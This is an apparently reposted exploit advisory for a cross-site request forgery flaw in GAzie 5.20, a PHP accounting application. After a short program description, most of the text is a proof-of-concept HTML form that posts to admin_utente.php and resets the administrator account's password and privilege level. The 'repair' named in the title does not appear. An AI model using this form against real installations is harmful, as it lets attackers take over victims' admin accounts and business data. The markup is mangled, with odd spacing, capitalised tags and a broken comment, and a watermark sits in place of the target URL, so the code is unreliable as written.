GAzie & lt; = 5.20 Cross-Site Request Forgery and repair

Title: GAzie <= 5.20 Cross Site Request Forgery
==========================================================
Author: giudinvx www.2cto.com <giudinvx [at] gmail [dot] com>
Website: http://www.giudinvx.altervista.org/
--------------------------------------------------------
@ Program information:
Multicompany finance application written in PHP using a MySql
Database backend for small to medium enterprise. It lets you
Write invoices, manage stock, manage orders, accounting, etc.
Send tax receept to electronic cash register.
@ Version 5.20 http://sourceforge.net/projects/gazie/
--------------------------------------------------------
============== [[-Test code-] ========================
<Form enctype = "multipart/form-data"
Action = "[www.2cto.com]/modules/config/admin_utente.php? Login = amministratore & Update"
Method = "POST">
<Input type = "hidden" name = "Login" value = "amministratore">
<Input type = "hidden" value = "" name = "Update">
<Input type = "text" value = "Surname" name = "Cognome" title = "Cognome">
<Input type = "text" value = "Name" name = "Nome" title = "Nome">
<Input type = "text" value = "italian" name = "lang">
<Input type = "text" value = "9" name = "Abilit"> <br/>
Password
<Input type = "password" value = "" name = "Password"> <br/> <! -- At least
Eight alphanumeric characters -->
Repeat password
<Input type = "password" value = "" name = "confpass"> <br/>
<Input type = "submit" value = "start the game" name = "Submit">
</Form>